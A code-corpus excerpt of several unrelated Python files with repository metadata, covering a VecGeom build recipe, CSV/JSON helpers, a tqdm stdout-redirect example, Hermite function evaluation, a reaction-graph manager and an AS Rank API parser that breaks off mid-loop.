    url = "https://gitlab.cern.ch/api/v4/projects/VecGeom%2FVecGeom/repository/archive.tar.gz?sha=v0.3.rc"
    version('01.01.03', git='https://gitlab.cern.ch/VecGeom/VecGeom.git', tag='v01.01.03', preferred=True)
    version('01.00.00', git='https://gitlab.cern.ch/VecGeom/VecGeom.git', tag='v01.00.00')
    version('00.05.00', git='https://gitlab.cern.ch/VecGeom/VecGeom.git', tag='v00.05.00')
    version('0.3.rc', sha256='a87a9ea4ab126b59ff9c79182bc0911ead3d76dd197194742e2a35ccd341299d')
    # C++ standard used for the build (forwarded as -DCMAKE_CXX_STANDARD).
    variant('cxxstd',
            default='17',
            values=('11', '14', '17'),
            multi=False,
            description='Use the specified C++ standard when building.')
    # SIMD instruction set; honoured on x86_64 only (see cmake_args).
    variant('vector',
            default='native',
            values=('sse3', 'sse4.2', 'native'),
            multi=False,
            description='Specify the instruction set for vectorization.')
    depends_on('cmake@3.5:', type='build')
    def cmake_args(self):
        """Return the CMake options for VecGeom."""
        # Fixed configuration: scalar backend, USolids interface enabled,
        # Geant4/ROOT integration disabled.
        options = [
            '-DBACKEND=Scalar',
            '-DGEANT4=OFF',
            '-DUSOLIDS=ON',
            '-DUSOLIDS_VECGEOM=ON',
            '-DROOT=OFF',
            '-DNO_SPECIALIZATION=ON',
            '-DCMAKE_VERBOSE_MAKEFILE=TRUE']
        options.append('-DCMAKE_CXX_STANDARD={0}'.
                       format(self.spec.variants['cxxstd'].value))
        arch = platform.machine()
        if arch == 'x86_64':
            # honour the 'vector' variant on x86_64 ...
            options.append('-DVECGEOM_VECTOR={0}'.
                           format(self.spec.variants['vector'].value))
        else:
            # ... otherwise pass the machine name straight through
            options.append('-DVECGEOM_VECTOR=' + arch)
        return options
| 648 | 0 | 27 |
e54bcc9091ea82eec692dff25ba500ba8747bb73 | 1,075 | py | Python | fileprocessing.py | lsauthie/nlp | 8d562443ffea056a66db6ec87823d9198255884d | [
"MIT"
] | null | null | null | fileprocessing.py | lsauthie/nlp | 8d562443ffea056a66db6ec87823d9198255884d | [
"MIT"
] | null | null | null | fileprocessing.py | lsauthie/nlp | 8d562443ffea056a66db6ec87823d9198255884d | [
"MIT"
] | null | null | null | # This module is in charge of managing files
import csv
import json
from pathlib import Path
import os
home = Path(__file__).parents[0]
#write configuration information
| 22.395833 | 81 | 0.611163 | # This module is in charge of managing files
import csv
import json
from pathlib import Path
import os
home = Path(__file__).parents[0]
def read_csv(filename):
    """Read *filename* (semicolon separated, UTF-8 with BOM) from the module
    directory and return its rows as a list of lists."""
    with open(home / filename, 'r', encoding="utf-8-sig") as csv_file:
        return list(csv.reader(csv_file, delimiter=';'))
def write_csv(filename, list_file):
    """Write *list_file* rows to *filename* as semicolon-separated CSV.

    Keeps prompting the user while the target file is locked
    (PermissionError, e.g. the file is open in Excel on Windows).
    """
    while True:
        try:
            output = open(home / filename, 'w', newline='', encoding='utf-8-sig')
            break
        except PermissionError:
            input("Please close the file: " + filename + " and click enter!")
    # `with` guarantees the handle is closed even if writing a row fails
    # (the original closed it manually and leaked the handle on error).
    with output:
        output_writer = csv.writer(output, delimiter=';')
        for i in list_file:
            output_writer.writerow(i)
#write configuration information
def read_json():
    """Load and return the configuration dictionary from config.json."""
    with open(home / 'config.json') as config_file:
        return json.load(config_file)
def write_json(data):
    """Persist the configuration dictionary *data* to config.json."""
    with open(home / 'config.json', 'w') as config_file:
        json.dump(data, config_file)
| 812 | 0 | 91 |
7ef4aae6f3e4070da2cce418773477b7fab5a70f | 1,647 | py | Python | examples/redirect_print.py | ofek/tqdm | 170bf4a353894f4f42190afac817c833b07077a6 | [
"MIT"
] | 1 | 2017-09-11T17:48:20.000Z | 2017-09-11T17:48:20.000Z | examples/redirect_print.py | ofek/tqdm | 170bf4a353894f4f42190afac817c833b07077a6 | [
"MIT"
] | null | null | null | examples/redirect_print.py | ofek/tqdm | 170bf4a353894f4f42190afac817c833b07077a6 | [
"MIT"
] | null | null | null | """Redirecting writing
If using a library that can print messages to the console, editing the library
by replacing `print()` with `tqdm.write()` may not be desirable.
In that case, redirecting `sys.stdout` to `tqdm.write()` is an option.
To redirect `sys.stdout`, create a file-like class that will write
any input string to `tqdm.write()`, and supply the arguments
`file=sys.stdout, dynamic_ncols=True`.
A reusable canonical example is given below:
"""
from __future__ import print_function
from time import sleep
import contextlib
import sys
from tqdm import tqdm
class DummyTqdmFile(object):
"""Dummy file-like that will write to tqdm"""
file = None
@contextlib.contextmanager
# Redirect stdout to tqdm.write() (don't forget the `as save_stdout`)
with stdout_redirect_to_tqdm() as save_stdout:
# tqdm call need to specify sys.stdout, not sys.stderr (default)
# and dynamic_ncols=True to autodetect console width
for _ in tqdm(range(3), file=save_stdout, dynamic_ncols=True):
blabla()
sleep(.5)
# After the `with`, printing is restored
print('Done!')
| 27 | 78 | 0.692168 | """Redirecting writing
If using a library that can print messages to the console, editing the library
by replacing `print()` with `tqdm.write()` may not be desirable.
In that case, redirecting `sys.stdout` to `tqdm.write()` is an option.
To redirect `sys.stdout`, create a file-like class that will write
any input string to `tqdm.write()`, and supply the arguments
`file=sys.stdout, dynamic_ncols=True`.
A reusable canonical example is given below:
"""
from __future__ import print_function
from time import sleep
import contextlib
import sys
from tqdm import tqdm
class DummyTqdmFile(object):
    """Dummy file-like that will write to tqdm.

    Stands in for sys.stdout so plain print() calls are routed through
    tqdm.write() and do not corrupt active progress bars.
    """
    # the real underlying stream (set in __init__)
    file = None
    def __init__(self, file):
        self.file = file
    def write(self, x):
        # Avoid print() second call (useless \n)
        if len(x.rstrip()) > 0:
            tqdm.write(x, file=self.file)
@contextlib.contextmanager
def stdout_redirect_to_tqdm():
    """Context manager: replace sys.stdout with a tqdm-aware wrapper.

    Yields the original sys.stdout (pass it to tqdm via file=) and restores
    it on exit, even when an exception escapes the with-block.
    """
    save_stdout = sys.stdout
    try:
        sys.stdout = DummyTqdmFile(sys.stdout)
        yield save_stdout
    # Relay exceptions
    except Exception as exc:
        raise exc
    # Always restore sys.stdout if necessary
    finally:
        sys.stdout = save_stdout
def blabla():
    # plain print(); with stdout redirected this lands in tqdm.write()
    print("Foo blabla")
# Redirect stdout to tqdm.write() (don't forget the `as save_stdout`)
with stdout_redirect_to_tqdm() as save_stdout:
    # the tqdm call needs file=<real stdout> (sys.stderr is the default)
    # and dynamic_ncols=True to autodetect console width
    for _ in tqdm(range(3), file=save_stdout, dynamic_ncols=True):
        blabla()
        sleep(.5)
# After the `with`, printing is restored
print('Done!')
| 447 | 0 | 99 |
5ca73c1342032c6607c82fdb86402a0ba3c46925 | 54 | py | Python | WinPlaceShowAPI/jsonapi/predictions.py | jojordan3/winplaceshow-api | eaa8383935339e4b3abb8167d6005290a731f426 | [
"MIT"
] | null | null | null | WinPlaceShowAPI/jsonapi/predictions.py | jojordan3/winplaceshow-api | eaa8383935339e4b3abb8167d6005290a731f426 | [
"MIT"
] | 6 | 2020-02-12T00:08:59.000Z | 2021-06-10T17:58:35.000Z | WinPlaceShowAPI/jsonapi/predictions.py | jojordan3/winplaceshow-api | eaa8383935339e4b3abb8167d6005290a731f426 | [
"MIT"
] | null | null | null | """Here is a thing""" | 13.5 | 22 | 0.62963 | """Here is a thing"""
class RacePredictor():
    """Placeholder for the win/place/show race prediction model (not implemented yet)."""
    pass
1133ddefe5c708be325c6b1aaa0cb80a18cf1bd3 | 5,120 | py | Python | hermite_functions/hermite_functions.py | Rob217/Hermite-functions | f6fc5f8115055619f2b8ec1051eca6c4621569a4 | [
"MIT"
] | 1 | 2020-09-14T20:00:52.000Z | 2020-09-14T20:00:52.000Z | hermite_functions/hermite_functions.py | Rob217/Hermite-functions | f6fc5f8115055619f2b8ec1051eca6c4621569a4 | [
"MIT"
] | 8 | 2020-08-24T10:02:24.000Z | 2020-09-14T19:36:26.000Z | hermite_functions/hermite_functions.py | Rob217/Hermite-functions | f6fc5f8115055619f2b8ec1051eca6c4621569a4 | [
"MIT"
] | null | null | null | import numpy as np
from scipy.special import eval_hermite, factorial
def hermite_functions(n, x, all_n=True, move_axes=(), method="recursive"):
    """
    Evaluate the Hermite functions psi_n(x).

    For background see:
    https://en.wikipedia.org/wiki/Hermite_polynomials#Hermite_functions

    Parameters
    ----------
    n : int
        Maximum (or only) order, n >= 0.
    x : scalar or ndarray
        Position(s) at which to evaluate.
    all_n : bool
        True  -> return psi_0 .. psi_n stacked along a new leading axis;
        False -> return only psi_n (the recursive method then keeps just
        psi_m, psi_{m-1} and psi_{m-2} in memory).
    move_axes : tuple
        When non-empty, (source, destination) axis lists forwarded to
        np.moveaxis to rearrange the output dimensions.
    method : str
        'recursive' -- recursion, most efficient for n > 5;
        'direct'    -- explicit Hermite-polynomial formula (slow, useful
                       for testing);
        'analytic'  -- closed-form expressions, only valid for n <= 5.

    The recursion used is
        psi_n(x) = sqrt(2/n) * x * psi_{n-1}(x) - sqrt((n-1)/n) * psi_{n-2}(x)

    Examples:
    >>> x = np.mgrid[-2:3, 0:4]
    >>> x.shape
    (2, 5, 4)
    >>> n = 5
    >>> psi = hermite_functions(n, x, all_n=False)
    >>> psi.shape
    (2, 5, 4)
    >>> psi = hermite_functions(n, x, all_n=True)
    >>> psi.shape
    (6, 2, 5, 4)
    >>> reshape = ([0, 1, 2, 3], [1, 3, 2, 0])
    >>> psi = hermite_functions(n, x, all_n=True, move_axes=reshape)
    >>> psi.shape
    (4, 6, 5, 2)
    """
    # Validation kept in this order so the raised error matches the first
    # violated condition (same messages as before).
    if method not in ("recursive", "analytic", "direct"):
        raise ValueError("Method not recognized.")
    if not isinstance(n, (int, np.integer)):
        raise TypeError("n must be an integer.")
    if n < 0:
        raise ValueError("n must be non-negative.")
    if method == "analytic" and n > 5:
        raise ValueError("n must not be greater than 5 for analytic calculation.")

    psi = _Hermite_all_n(n, x, method) if all_n else _Hermite_single_n(n, x, method)
    if move_axes:
        psi = np.moveaxis(psi, move_axes[0], move_axes[1])
    return psi
def _Hermite_single_n(n, x, method):
    """
    Evaluate psi_n(x) for a single order n.

    The recursive path keeps only the two most recent functions in memory.
    """
    if method == "analytic":
        return _H_analytic(n, x)
    if method == "direct":
        return _H_direct(n, x)
    # recursive path: walk up from psi_0 and psi_1
    prev = _H_analytic(0, x)
    if n == 0:
        return prev
    curr = _H_analytic(1, x)
    for m in range(2, n + 1):
        prev, curr = curr, _H_recursive(m, x, prev, curr)
    return curr
def _Hermite_all_n(n, x, method):
    """
    Return psi_m(x) for every order 0 <= m <= n, stacked along axis 0.
    """
    # Output shape is (n + 1,) + x.shape; scalar x falls back to a
    # trailing length-1 axis.
    try:
        out = np.zeros((n + 1,) + x.shape)
    except AttributeError:  # x has no 'shape' attribute (plain scalar)
        out = np.zeros((n + 1, 1))
    if method == "analytic":
        for order in range(n + 1):
            out[order, :] = _H_analytic(order, x)
        return out
    if method == "direct":
        for order in range(n + 1):
            out[order, :] = _H_direct(order, x)
        return out
    # Recursive method: rows 0 and 1 come from the closed forms, every
    # later row from the two rows directly below it.
    out[0, :] = _H_analytic(0, x)
    if n == 0:
        return out
    out[1, :] = _H_analytic(1, x)
    if n == 1:
        return out
    for order in range(2, n + 1):
        out[order, :] = _H_recursive(order, x, out[order - 2, :],
                                     out[order - 1, :])
    return out
def _H_recursive(m, x, psi_m_minus_2, psi_m_minus_1):
    """
    Advance the Hermite-function recurrence one step to psi_m(x):

    psi_m(x) = sqrt(2/m) * x * psi_{m-1}(x) - sqrt((m-1)/m) * psi_{m-2}(x)
    """
    step_up = np.sqrt(2 / m) * x * psi_m_minus_1
    step_down = np.sqrt((m - 1) / m) * psi_m_minus_2
    return step_up - step_down
def _H_analytic(n, x):
    """
    Closed-form Hermite functions psi_n(x) for orders 0 through 5.

    Raises:
        ValueError: if n is outside [0, 5].
    """
    gaussian = np.exp(-(x ** 2) / 2)
    pi_quarter_root = np.pi ** (1 / 4)
    if n == 0:
        return gaussian / pi_quarter_root
    if n == 1:
        return np.sqrt(2) * x * gaussian / pi_quarter_root
    if n == 2:
        return (2 * x ** 2 - 1) * gaussian / (np.sqrt(2) * pi_quarter_root)
    if n == 3:
        return (2 * x ** 3 - 3 * x) * gaussian / (np.sqrt(3) * pi_quarter_root)
    if n == 4:
        return ((4 * x ** 4 - 12 * x ** 2 + 3) * gaussian
                / (2 * np.sqrt(6) * pi_quarter_root))
    if n == 5:
        return ((4 * x ** 5 - 20 * x ** 3 + 15 * x) * gaussian
                / (2 * np.sqrt(15) * pi_quarter_root))
    raise ValueError("n must be an integer between 0 and 5")
def _H_direct(n, x):
    """
    Evaluate psi_n(x) straight from the explicit definition.

    Uses the physicists' Hermite polynomial H_n and the normalisation
    1 / sqrt(2**n * n!) * pi**(-1/4); slower than the recursion because
    of the factorial and polynomial evaluation, but handy for testing.
    """
    normalisation = np.sqrt(2 ** n * factorial(n))
    envelope = np.pi ** (-1 / 4) * np.exp(-(x ** 2) / 2)
    return envelope * eval_hermite(n, x) / normalisation
if __name__ == "__main__":
    # Run the embedded doctest examples as a lightweight self-check.
    import doctest
    doctest.testmod()
| 26.947368 | 84 | 0.525391 | import numpy as np
from scipy.special import eval_hermite, factorial
def hermite_functions(n, x, all_n=True, move_axes=(), method="recursive"):
    """
    Evaluate the Hermite functions psi_n at position(s) x.

    For details see:
    https://en.wikipedia.org/wiki/Hermite_polynomials#Hermite_functions

    Arguments:
        n: highest order to evaluate (non-negative integer).
        all_n: if True, return every order 0..n stacked on a new leading
            axis; if False, return only order n (with the recursive
            method this keeps just three orders in memory).
        move_axes: optional (source, destination) axis lists handed to
            np.moveaxis to reshuffle the output dimensions.
        method: 'recursive' (most efficient for n > 5), 'direct'
            (explicit Hermite-polynomial formula, mainly for testing),
            or 'analytic' (closed forms, only valid for n <= 5).

    Recursion relation:
    psi_n(x) = sqrt(2/n) * x * psi_{n-1}(x) - sqrt((n-1)/n) * psi_{n-2}(x)

    Examples:
    >>> x = np.mgrid[-2:3, 0:4]
    >>> x.shape
    (2, 5, 4)
    >>> n = 5
    >>> psi = hermite_functions(n, x, all_n=False)
    >>> psi.shape
    (2, 5, 4)
    >>> psi = hermite_functions(n, x, all_n=True)
    >>> psi.shape
    (6, 2, 5, 4)
    >>> reshape = ([0, 1, 2, 3], [1, 3, 2, 0])
    >>> psi = hermite_functions(n, x, all_n=True, move_axes=reshape)
    >>> psi.shape
    (4, 6, 5, 2)
    """
    # Validate arguments before dispatching to the workers.
    if method not in ("recursive", "analytic", "direct"):
        raise ValueError("Method not recognized.")
    if not issubclass(type(n), (int, np.integer)):
        raise TypeError("n must be an integer.")
    if n < 0:
        raise ValueError("n must be non-negative.")
    if method == "analytic" and n > 5:
        raise ValueError("n must not be greater than 5 for analytic calculation.")
    evaluate = _Hermite_all_n if all_n else _Hermite_single_n
    result = evaluate(n, x, method)
    if move_axes:
        result = np.moveaxis(result, move_axes[0], move_axes[1])
    return result
def _Hermite_single_n(n, x, method):
    """
    Calculates psi_n(x) for a single value of n.

    With the recursive method only the two most recent orders are kept,
    so memory use is independent of n.
    """
    if method == "analytic":
        return _H_analytic(n, x)
    if method == "direct":
        return _H_direct(n, x)
    # Seed the two-term recurrence with the analytic psi_0 and psi_1.
    psi_m_minus_2 = _H_analytic(0, x)
    if n == 0:
        return psi_m_minus_2
    psi_m_minus_1 = _H_analytic(1, x)
    if n == 1:
        return psi_m_minus_1
    for m in range(2, n + 1):
        psi_m = _H_recursive(m, x, psi_m_minus_2, psi_m_minus_1)
        # Slide the window: psi_{m-1} and psi_m become the new seeds.
        psi_m_minus_2 = psi_m_minus_1
        psi_m_minus_1 = psi_m
    return psi_m
def _Hermite_all_n(n, x, method):
    """
    Calculates psi_m(x) for all 0 <= m <= n, stacked along a new axis 0.
    """
    # Output has shape (n + 1,) + x.shape; plain scalars fall back to a
    # trailing length-1 axis.
    try:
        psi_n = np.zeros((n + 1,) + x.shape)
    except AttributeError:  # x does not have property 'shape'
        psi_n = np.zeros((n + 1, 1))
    if method == "analytic":
        for m in range(n + 1):
            psi_n[m, :] = _H_analytic(m, x)
        return psi_n
    if method == "direct":
        for m in range(n + 1):
            psi_n[m, :] = _H_direct(m, x)
        return psi_n
    # Recursive method: rows 0 and 1 come from the closed forms, every
    # later row from the two rows directly below it.
    psi_n[0, :] = _H_analytic(0, x)
    if n == 0:
        return psi_n
    psi_n[1, :] = _H_analytic(1, x)
    if n == 1:
        return psi_n
    for m in range(2, n + 1):
        psi_n[m, :] = _H_recursive(m, x, psi_n[m - 2, :], psi_n[m - 1, :])
    return psi_n
def _H_recursive(m, x, psi_m_minus_2, psi_m_minus_1):
    """
    Calculate psi_m(x) using the recursion relation

    psi_m(x) = sqrt(2/m) * x * psi_{m-1}(x) - sqrt((m-1)/m) * psi_{m-2}(x)
    """
    return np.sqrt(2 / m) * x * psi_m_minus_1 - np.sqrt((m - 1) / m) * psi_m_minus_2
def _H_analytic(n, x):
    """
    Analytic expressions for psi_n(x) for 0 <= n <= 5.

    Raises ValueError for any other order; higher orders must use the
    recursive or direct methods instead.
    """
    if n == 0:
        return np.pi ** (-1 / 4) * np.exp(-(x ** 2) / 2)
    if n == 1:
        return np.sqrt(2) * np.pi ** (-1 / 4) * x * np.exp(-(x ** 2) / 2)
    if n == 2:
        return (
            (np.sqrt(2) * np.pi ** (1 / 4)) ** (-1)
            * (2 * x ** 2 - 1)
            * np.exp(-(x ** 2) / 2)
        )
    if n == 3:
        return (
            (np.sqrt(3) * np.pi ** (1 / 4)) ** (-1)
            * (2 * x ** 3 - 3 * x)
            * np.exp(-(x ** 2) / 2)
        )
    if n == 4:
        return (
            (2 * np.sqrt(6) * np.pi ** (1 / 4)) ** (-1)
            * (4 * x ** 4 - 12 * x ** 2 + 3)
            * np.exp(-(x ** 2) / 2)
        )
    if n == 5:
        return (
            (2 * np.sqrt(15) * np.pi ** (1 / 4)) ** (-1)
            * (4 * x ** 5 - 20 * x ** 3 + 15 * x)
            * np.exp(-(x ** 2) / 2)
        )
    raise ValueError("n must be an integer between 0 and 5")
def _H_direct(n, x):
    """
    Calculate psi_n(x) using explicit definition.

    Uses the physicists' Hermite polynomial H_n with normalisation
    1 / sqrt(2**n * n!) * pi**(-1/4); mainly useful for cross-checking
    the recursive implementation.
    """
    return (
        1
        / np.sqrt(2 ** n * factorial(n))
        * np.pi ** (-1 / 4)
        * np.exp(-(x ** 2) / 2)
        * eval_hermite(n, x)
    )
if __name__ == "__main__":
    # Run the embedded doctest examples as a lightweight self-check.
    import doctest
    doctest.testmod()
| 0 | 0 | 0 |
9181edf2bd0bc5bea757c317ebd41cf545bd2f15 | 2,979 | py | Python | sbcdb/reaction_utils.py | neilswainston/Grimoire | 42775ff9a03fdbd3b47269b46c883fdf5b37a2be | [
"MIT"
] | 9 | 2019-04-24T12:47:10.000Z | 2021-05-12T12:46:33.000Z | sbcdb/reaction_utils.py | neilswainston/Grimoire | 42775ff9a03fdbd3b47269b46c883fdf5b37a2be | [
"MIT"
] | 1 | 2017-01-16T08:45:19.000Z | 2017-01-16T08:45:19.000Z | sbcdb/reaction_utils.py | synbiochem/biochem4j | 42775ff9a03fdbd3b47269b46c883fdf5b37a2be | [
"MIT"
] | 5 | 2019-10-13T14:02:28.000Z | 2020-12-23T18:44:29.000Z | '''
SYNBIOCHEM-DB (c) University of Manchester 2015
SYNBIOCHEM-DB is licensed under the MIT License.
To view a copy of this license, visit <http://opensource.org/licenses/MIT/>.
@author: neilswainston
'''
from sbcdb.enzyme_utils import EnzymeManager
class ReactionManager(object):
    '''Class to implement a manager of Reaction data.'''

    def __init__(self):
        '''Constructor.'''
        # reac_id -> property dict for the neo4j Reaction node.
        self.__nodes = {}
        # (source + external id) -> canonical reaction id, used to
        # de-duplicate reactions referenced under several namespaces.
        self.__reac_ids = {}
        self.__reac_enz_rels = []
        self.__org_enz_rels = []
        self.__enz_man = EnzymeManager()

    def write_files(self, writer):
        '''Write neo4j import files.'''
        node_files = [writer.write_nodes(self.__nodes.values(), 'Reaction'),
                      writer.write_nodes(self.__enz_man.get_nodes(),
                                         'Enzyme')]
        rel_files = [writer.write_rels(self.__reac_enz_rels,
                                       'Reaction', 'Enzyme'),
                     writer.write_rels(self.__enz_man.get_org_enz_rels(),
                                       'Organism', 'Enzyme')]
        return node_files, rel_files

    def add_reaction(self, source, reac_id, properties):
        '''Adds a reaction to the collection of nodes, ensuring uniqueness.'''
        # Resolve to the canonical id if this source/id pair was seen before.
        reac_id = self.__reac_ids.get(source + reac_id, reac_id)
        if reac_id in self.__nodes:
            self.__nodes[reac_id].update(properties)
        else:
            properties[':LABEL'] = 'Reaction'
            properties['id:ID(Reaction)'] = reac_id
            properties['source'] = source
            properties[source] = reac_id
            self.__nodes[reac_id] = properties
            # Register every cross-reference so later lookups map back
            # to this canonical id.
            for namespace in ('mnx', 'kegg.reaction', 'rhea'):
                if namespace in properties:
                    self.__reac_ids[namespace + properties[namespace]] = \
                        reac_id
        return reac_id

    def add_react_to_enz(self, data, source, num_threads=0):
        '''Submit data to the graph.'''
        # Create Reaction and Enzyme nodes:
        uniprot_ids = self.__create_react_enz(data, source)
        # Create Enzyme nodes:
        self.__enz_man.add_uniprot_data(uniprot_ids, source, num_threads)

    def __create_react_enz(self, data, source):
        '''Creates Reaction and Enzyme nodes and their Relationships.'''
        enzyme_ids = []
        for reac_id, uniprot_ids in data.iteritems():
            canonical_id = self.add_reaction(source, reac_id, {})
            for uniprot_id in uniprot_ids:
                enzyme_ids.append(uniprot_id)
                self.__reac_enz_rels.append([canonical_id, 'catalysed_by',
                                             uniprot_id,
                                             {'source': source}])
        return list(set(enzyme_ids))
| 35.891566 | 78 | 0.570326 | '''
SYNBIOCHEM-DB (c) University of Manchester 2015
SYNBIOCHEM-DB is licensed under the MIT License.
To view a copy of this license, visit <http://opensource.org/licenses/MIT/>.
@author: neilswainston
'''
from sbcdb.enzyme_utils import EnzymeManager
class ReactionManager(object):
    '''Class to implement a manager of Reaction data.'''
    def __init__(self):
        '''Constructor.'''
        # reac_id -> property dict for the neo4j Reaction node.
        self.__nodes = {}
        # (source + external id) -> canonical reaction id, used to
        # de-duplicate reactions referenced under several namespaces.
        self.__reac_ids = {}
        self.__reac_enz_rels = []
        self.__org_enz_rels = []
        self.__enz_man = EnzymeManager()
    def write_files(self, writer):
        '''Write neo4j import files.

        Returns a (node_files, relationship_files) tuple of whatever the
        writer's write_nodes/write_rels calls return.
        '''
        return ([writer.write_nodes(self.__nodes.values(),
                                    'Reaction'),
                 writer.write_nodes(self.__enz_man.get_nodes(),
                                    'Enzyme')],
                [writer.write_rels(self.__reac_enz_rels,
                                   'Reaction', 'Enzyme'),
                 writer.write_rels(self.__enz_man.get_org_enz_rels(),
                                   'Organism', 'Enzyme')])
    def add_reaction(self, source, reac_id, properties):
        '''Adds a reaction to the collection of nodes, ensuring uniqueness.'''
        # Resolve to the canonical id if this source/id pair was seen before.
        reac_id = self.__reac_ids[source + reac_id] \
            if source + reac_id in self.__reac_ids else reac_id
        if reac_id not in self.__nodes:
            properties[':LABEL'] = 'Reaction'
            properties['id:ID(Reaction)'] = reac_id
            properties['source'] = source
            properties[source] = reac_id
            self.__nodes[reac_id] = properties
            # Register every cross-reference so later lookups map back
            # to this canonical id.
            if 'mnx' in properties:
                self.__reac_ids['mnx' + properties['mnx']] = reac_id
            if 'kegg.reaction' in properties:
                self.__reac_ids[
                    'kegg.reaction' + properties['kegg.reaction']] = reac_id
            if 'rhea' in properties:
                self.__reac_ids['rhea' + properties['rhea']] = reac_id
        else:
            # Already known: merge the new properties into the node.
            self.__nodes[reac_id].update(properties)
        return reac_id
    def add_react_to_enz(self, data, source, num_threads=0):
        '''Submit data to the graph.

        data maps reaction ids to iterables of UniProt ids.
        '''
        # Create Reaction and Enzyme nodes:
        enzyme_ids = self.__create_react_enz(data, source)
        # Create Enzyme nodes:
        self.__enz_man.add_uniprot_data(enzyme_ids, source, num_threads)
    def __create_react_enz(self, data, source):
        '''Creates Reaction and Enzyme nodes and their Relationships.

        Returns the de-duplicated list of UniProt ids encountered.
        '''
        enzyme_ids = []
        # NOTE: dict.iteritems() -- this module targets Python 2.
        for reac_id, uniprot_ids in data.iteritems():
            reac_id = self.add_reaction(source, reac_id, {})
            for uniprot_id in uniprot_ids:
                enzyme_ids.append(uniprot_id)
                self.__reac_enz_rels.append([reac_id, 'catalysed_by',
                                             uniprot_id,
                                             {'source': source}])
        return list(set(enzyme_ids))
| 0 | 0 | 0 |
173faf3fa2e7960c16e61ab2a3f0a1a52bc4c745 | 3,830 | py | Python | lib_bgp_data/collectors/as_rank_v2/as_rank_v2_parser.py | jfuruness/lib_bgp_data | 25f7d57b9e2101c7aefb325e8d728bd91f47d557 | [
"BSD-3-Clause"
] | 16 | 2018-09-24T05:10:03.000Z | 2021-11-29T19:18:59.000Z | lib_bgp_data/collectors/as_rank_v2/as_rank_v2_parser.py | jfuruness/lib_bgp_data | 25f7d57b9e2101c7aefb325e8d728bd91f47d557 | [
"BSD-3-Clause"
] | 4 | 2019-10-09T18:54:17.000Z | 2021-03-05T14:02:50.000Z | lib_bgp_data/collectors/as_rank_v2/as_rank_v2_parser.py | jfuruness/lib_bgp_data | 25f7d57b9e2101c7aefb325e8d728bd91f47d557 | [
"BSD-3-Clause"
] | 3 | 2018-09-17T17:35:18.000Z | 2020-03-24T16:03:31.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Contains AS_Rank_V2 which parses AS Rank data using the Restful API
In contrast to the previous parser this also gets organization, rank,
and links to other ASNs"""
__author__ = "Nicholas Shpetner"
__credits__ = ["Nicholas Shpetner", "Abhinna Adhikari", "Justin Furuness"]
__Lisence__ = "BSD"
__maintainer__ = "Justin Furuness"
__email__ = "jfuruness@gmail.com"
__status__ = "Production"
import os
import json
import urllib.request
import time
from .tables import AS_Rank_V2
from ...utils import utils
from ...utils.base_classes import Parser
class AS_Rank_Parser_V2(Parser):
    """Parses the AS rank data from https://asrank.caida.org/
    """
    __slots__ = []
    url_base = 'https://api.asrank.caida.org/v2/restful/'
    header_base = {'accept': 'application/json'}
    def _run(self, first_rank=None, last_rank=None):
        """Parses the AS rank data from https://asrank.caida.org/

        Pages through the v2 restful API, optionally restricted to the
        rank window [first_rank, last_rank), writes the rows to a CSV and
        bulk-loads them into the AS_Rank_V2 table.  Returns the total AS
        count reported by the API.
        """
        # Clear the table before every run
        with AS_Rank_V2(clear=True) as db:
            pass
        if first_rank is not None and last_rank is not None:
            assert last_rank > first_rank
        next_page = True
        # Defaults
        first = 10000  # page size requested from the API
        offset = 0  # rank offset of the next page
        count = 1  # running rank counter across pages
        final_count = 0
        if first_rank is not None:
            offset = first_rank
            count = first_rank
        if last_rank is not None:
            # NOTE(review): if last_rank is supplied without first_rank,
            # this subtracts None and raises TypeError -- confirm callers
            # always pass both or neither.
            if (last_rank - first_rank) < 10000:
                first = last_rank - first_rank
        rows = []
        while(next_page):
            url = self.url_base + f"asns/?first={first}&offset={offset}"
            req = urllib.request.Request(url, None, self.header_base)
            with urllib.request.urlopen(req) as response:
                page = response.read()
            data = json.loads(page.decode('utf-8'))
            asns = data['data']['asns']
            for asn in asns['edges']:
                node = asn['node']
                # The loop variable is rebound to the integer ASN here.
                asn = int(node['asn'])
                rank = int(node['rank'])
                # _get_links is defined elsewhere in this class (not shown
                # in this view); presumably returns the linked ASNs.
                links = self._get_links(asn)
                rows.append([rank, asn, node['asnName'], links])
                count += 1
            if asns['pageInfo']['hasNextPage'] is False:
                next_page = False
                final_count = asns['totalCount']
            if last_rank is not None:
                if count >= last_rank:
                    next_page = False
                    final_count = asns['totalCount']
                elif (first + count) >= last_rank:
                    # Shrink the final page so we stop exactly at last_rank.
                    first = last_rank - count + 1
                    offset = count
        path = os.path.join(self.csv_dir, 'as_rank_v2.csv')
        utils.rows_to_db(rows, path, AS_Rank_V2, clear_table=False)
        return final_count
| 32.735043 | 81 | 0.538381 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Contains AS_Rank_V2 which parses AS Rank data using the Restful API
In contrast to the previous parser this also gets organization, rank,
and links to other ASNs"""
__author__ = "Nicholas Shpetner"
__credits__ = ["Nicholas Shpetner", "Abhinna Adhikari", "Justin Furuness"]
__Lisence__ = "BSD"
__maintainer__ = "Justin Furuness"
__email__ = "jfuruness@gmail.com"
__status__ = "Production"
import os
import json
import urllib.request
import time
from .tables import AS_Rank_V2
from ...utils import utils
from ...utils.base_classes import Parser
class AS_Rank_Parser_V2(Parser):
    """Parses the AS rank data from https://asrank.caida.org/
    """

    __slots__ = []

    url_base = 'https://api.asrank.caida.org/v2/restful/'
    header_base = {'accept': 'application/json'}

    def _run(self, first_rank=None, last_rank=None):
        """Parses the AS rank data from https://asrank.caida.org/

        Pages through the v2 restful API, optionally restricted to the
        rank window [first_rank, last_rank), writes the rows to a CSV
        and bulk-loads them into the AS_Rank_V2 table.

        Args:
            first_rank: optional rank to start from (used as API offset).
            last_rank: optional rank at which to stop.

        Returns:
            The total AS count reported by the API.
        """
        # Clear the table before every run
        with AS_Rank_V2(clear=True):
            pass
        if first_rank is not None and last_rank is not None:
            assert last_rank > first_rank
        next_page = True
        # Defaults: page size 10000, starting at the top of the ranking.
        first = 10000
        offset = 0
        count = 1
        final_count = 0
        if first_rank is not None:
            offset = first_rank
            count = first_rank
        # Shrink the first page if the requested window is smaller.
        # Bug fix: also require first_rank here -- the previous code
        # subtracted None when only last_rank was supplied (TypeError).
        if first_rank is not None and last_rank is not None:
            if (last_rank - first_rank) < 10000:
                first = last_rank - first_rank
        rows = []
        while next_page:
            url = self.url_base + f"asns/?first={first}&offset={offset}"
            req = urllib.request.Request(url, None, self.header_base)
            with urllib.request.urlopen(req) as response:
                page = response.read()
            data = json.loads(page.decode('utf-8'))
